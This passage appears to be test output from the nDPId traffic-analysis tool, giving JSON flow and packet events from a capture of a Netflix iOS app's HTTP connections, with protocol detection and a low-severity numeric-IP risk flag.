-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"} -01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"} -01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1484319056210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056210,"pkt":"gCqoTGHM5JjWH70UCABFAABAc11AAEAG4jDAqAEHF\/YLhc+1AFCjZhjfAAAAALAC\/\/+VoQAAAgQFtAEDAwUBAQgKH2UQgQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056214,"flow_last_seen":1484319056214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056214,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1484319056214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056214,"pkt":"gCqoTGHM5JjWH70UCABFAABAlQtAAEAGwHrAqAEHF\/YLjc+2AFBDrGT6AAAAALAC\/\/+pMwAAAgQFtAEDAwUBAQgKH2UQhQAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1484319056215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056215,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7RnATKV8McKF6AS\/\/8JWwAAAgQFtAEDAwkEAggKNWmPpR9lEHs="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABALEhAAEAGKT7AqAEHF\/YLjc+5AFBMFfUEAAAAALAC\/\/8QsgAAAgQFtAEDAwUBAQgKH2UQkAAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABACXBAAEAGTBbAqAEHF\/YLjc+6AFDVkM0AAAAAALAC\/\/+vNgAAAgQFtAEDAwUBAQgKH2UQkwAAAAAEAgAA"} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7VYH\/mqo2YY4KAS\/\/\/lFwAAAgQFtAEDAwkEAggKL5BAHx9lEIE="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7YrOmTYQ6xk+6AS\/\/\/4+gAAAgQFtAEDAwkEAggKJ9gJPh9lEIU="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056234,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056234,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1484319056234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056234,"pkt":"gCqoTGHM5JjWH70UCABFAABATZFAAEAGB\/XAqAEHF\/YLjc+7AFDfu3VVAAAAALAC\/\/\/8sgAAAgQFtAEDAwUBAQgKH2UQlgAAAAAEAgAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1484319056235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056235,"pkt":"gCqoTGHM5JjWH70UCABFAAA09NVAAEAGYMTAqAEHF\/YLhc+1AFCjZhjgWB\/5q4AQEBUDvAAAAQEICh9lEJYvkEAf"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1484319056236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056236,"pkt":"gCqoTGHM5JjWH70UCABFAAA0j6xAAEAGxeXAqAEHF\/YLjc+2AFBDrGT7Kzpk2YAQEBUXoQAAAQEICh9lEJgn2Ak+"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1484319056237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056237,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7dWBL6lu6spYaAS\/\/\/t4QAAAgQFtAEDAwkEAggKuIfCpR9lEIk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 